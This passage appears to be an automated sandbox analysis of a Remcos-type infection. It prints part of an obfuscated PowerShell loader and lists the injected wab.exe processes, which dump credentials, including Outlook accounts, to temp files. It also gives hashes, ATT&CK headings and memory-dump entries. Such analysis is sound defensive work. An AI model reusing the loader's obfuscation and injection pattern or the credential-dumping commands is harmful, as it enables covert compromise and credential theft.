;$Tyndtarmsbetndelser=$Djaevlekulterne[$Projekter];}$Vidervrdige=348811;$Snigmyrdedes=30612;Brugsprogrammet (Ligningsanvisningerne 'genneml$BddelksgDemerbilAal.orgoBla.folb blodsta .bpspol Herree:O.hidseRCrispieeSel.rnelOutwasteMimeoouvFaderskeRetfrdinge,icultIsoterm pel rin=Kedelsm AfmeldGOrnameneAlkalo.t Indbin-Soa.eduCPeripneo Oxidizn TankmatFina,smeSpaltennKumenintForpagt tekstbe$ R.cenrLCenturioPentecorPanamaiePokaltunSe,refitSupe,stz Emball ');Brugsprogrammet (Ligningsanvisningerne 'Trkgrun$Angka.yg Bra.hylSangtekoOverbevbSejtrknaD.arekilHvidm l:Delab aVforhaaba RaceadnsoberindstedsanrAnsttel S,mmerf=Bil ion Forgrim[PseudofSKae.ermypilinspsUnmediat Seniore Leci imStunt,e.RenslysCCacodonoForsor.nOtteogtvsensomreKallacirFors dot Predis]Uoplagt:Gnattie: .respeF ,ukkedrTo.elejoDagpengmVociferBP,overbaSinewras FruktoePh,toce6 rabidi4 SecretSVennekrtgal.erirSigtendiPhyl opnInpour gO,eocys(Ammerne$Aco.misRHandlekeFen,eril So bereManasquvRetireeeBoutelon Deas.itPaamind)Telegra ');Brugsprogrammet (Ligningsanvisningerne ' Oatydy$Trije.sg ModerllheemraaoUnripedb DiminuaDepositlslotted:Serviett Polysua BrochamCointere CaractiFedterinWagweno Dag,sta=Sacromo Temulen[RavenouSDi,fusiygenic,ts Ko muntHelc,ideChefposmsp.ctro.UvenskaTPi sedaekongsgaxTartarit Plough.Bossa.oEDom.fldnconsolec Fungico NaturldPjaskeni Libe tnO.erthrgUnsacri]Gly ure:Uncu,be:BanderiANonecceSStrygerC IchthyISystemeIDraftin.NonfragGIllessrePent.grtInter.eSPipinghtDigitalrmalefici,altedenJuggledgTypehol(,opulis$ObservaVOmkvdena raa,linFoste,idVenomi.rIndbygg)Coccusa ');Brugsprogrammet (Ligningsanvisningerne 'Nonspor$KalvestgKolonielOverflyo flsserb ,homboaRostrallfragt k:ElectromReallowl azionakwiltslaeDirplusk Vit igoFrilgnin EftertsTress,eePerik nrKlevognvHandelseUgenkensStrammef.arnsseaFjeder b rskninrLagerlii.megabsk Fe.tilkErost,aeTaurocorAret abnPoetryleKnoglem=Toluidi$Afstaaetdisambia UninvemFodbolde FyrassiAdelsslnNonfact.RboensbsMes,speuSu,trudb PopulasBagtipptFolketirJernrrfi Rebusin afple,gVildska(Bonbonn$TregrenVSocio,eiAnarchad Trav,leRdderl.r Propfuv exapodrVandrefdO,erstriHem.secgTheraphePont,ne, underl$ AziethSVoic,prnOpmarchiTrdiagrgDiapalmm faglityStedsndr Svirved Ted.ume ResortdFolkmoteSlambehsNoakine)Ampulet ');Brugsprogrammet $mlkekonservesfabrikkerne;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2236

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lnpauser.Whi && echo t"
4⤵
PID:1956

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1904

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\smqd"
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1220

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\covvbxb"
5⤵
- Accesses Microsoft Outlook accounts
PID:1504

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\fiaobplnuao"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:324

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Email Collection

T1114

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat
Filesize
144B

MD5
e5607be2a8bb5b665d0e9b0aad0f7b28

SHA1
479872fbe6e38093095b79cb1bb075233ff22c29

SHA256
17fd4a19151aca9187b5bad6346912479315598a43dca28dab08939812aead40

SHA512
d2c38bd8df6de30785759e3a50fce6e0edf7c0c2faf9b54201943069ff30bc8661bcbd58c162d67ceaa95e876c1a3176032eb4d6c8e655295b7092162a672163

Download Submit
C:\Users\Admin\AppData\Local\Temp\smqd
Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Lnpauser.Whi
Filesize
494KB

MD5
c28d6b2ceae5dffd7a142c049d5b4d30

SHA1
345331b6ef241644eb175f84d395ed8eb9d5535e

SHA256
59e6d1046b16283769943f531b27a79e946b47a1fa8e889f69ec165b92088385

SHA512
ea75770ea523290f2fb4e7dd68e9b1f0f2a216e778467ebb5d2bb994237447550d16802c18722c80f0ca08bfe4510220d933afd1ab890af114c13aed2c7c1a37

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\22FGNTY5OTTOR5GK9WVK.temp
Filesize
7KB

MD5
f0a9013b40a19706c39d8875c3cbee56

SHA1
bdcdcbe372faee3e14829271897f2b39a2a5b317

SHA256
fd96fc774ccbc6dda7f00dfd212127d1cd3ed024adc99f09a7b89e48358f56f2

SHA512
2321ed43555531a89ddbf9b65537e246e06e826f15eb83a892e38842bee04848abe57b391c2f79663e787536104ba76683c1aee92f1c4fa935034a5aba4aefe6

Download Submit
memory/324-52-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/324-51-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/324-50-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1220-42-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1220-45-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1220-41-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1220-47-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1504-46-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1504-48-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1504-44-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1904-64-0x0000000000370000-0x0000000000389000-memory.dmp

Filesize
100KB

Download
memory/1904-69-0x0000000001010000-0x0000000002072000-memory.dmp

Filesize
16.4MB

Download
memory/1904-34-0x0000000001010000-0x0000000002072000-memory.dmp

Filesize
16.4MB

Download
memory/1904-33-0x0000000001010000-0x0000000002072000-memory.dmp

Filesize
16.4MB

Download
memory/1904-90-0x0000000001010000-0x0000000002072000-memory.dmp

Filesize
16.4MB

Download
memory/1904-87-0x0000000001010000-0x0000000002072000-memory.dmp

Filesize
16.4MB

Download
memory/1904-84-0x0000000001010000-0x0000000002072000-memory.dmp

Filesize
16.4MB

Download
memory/1904-81-0x0000000001010000-0x0000000002072000-memory.dmp

Filesize
16.4MB

Download
memory/1904-78-0x0000000001010000-0x0000000002072000-memory.dmp

Filesize
16.4MB

Download
memory/1904-75-0x0000000001010000-0x0000000002072000-memory.dmp

Filesize
16.4MB

Download
memory/1904-72-0x0000000001010000-0x0000000002072000-memory.dmp

Filesize
16.4MB

Download
memory/1904-66-0x0000000001010000-0x0000000002072000-memory.dmp

Filesize
16.4MB

Download
memory/1904-63-0x0000000000370000-0x0000000000389000-memory.dmp

Filesize
100KB

Download
memory/1904-58-0x0000000001010000-0x0000000002072000-memory.dmp

Filesize
16.4MB

Download
memory/1904-60-0x0000000000370000-0x0000000000389000-memory.dmp

Filesize
100KB

Download
memory/2236-29-0x00000000066F0000-0x000000000A9CB000-memory.dmp

Filesize
66.9MB

Download
memory/2724-18-0x00000000028E0000-0x00000000028E8000-memory.dmp

Filesize
32KB

Download
memory/2724-16-0x000007FEF555E000-0x000007FEF555F000-memory.dmp

Filesize
4KB

Download
memory/2724-19-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2724-17-0x000000001B470000-0x000000001B752000-memory.dmp

Filesize
2.9MB

Download
memory/2724-38-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2724-20-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2724-21-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2724-22-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2724-23-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2724-30-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2724-31-0x000007FEF555E000-0x000007FEF555F000-memory.dmp

Filesize
4KB

Download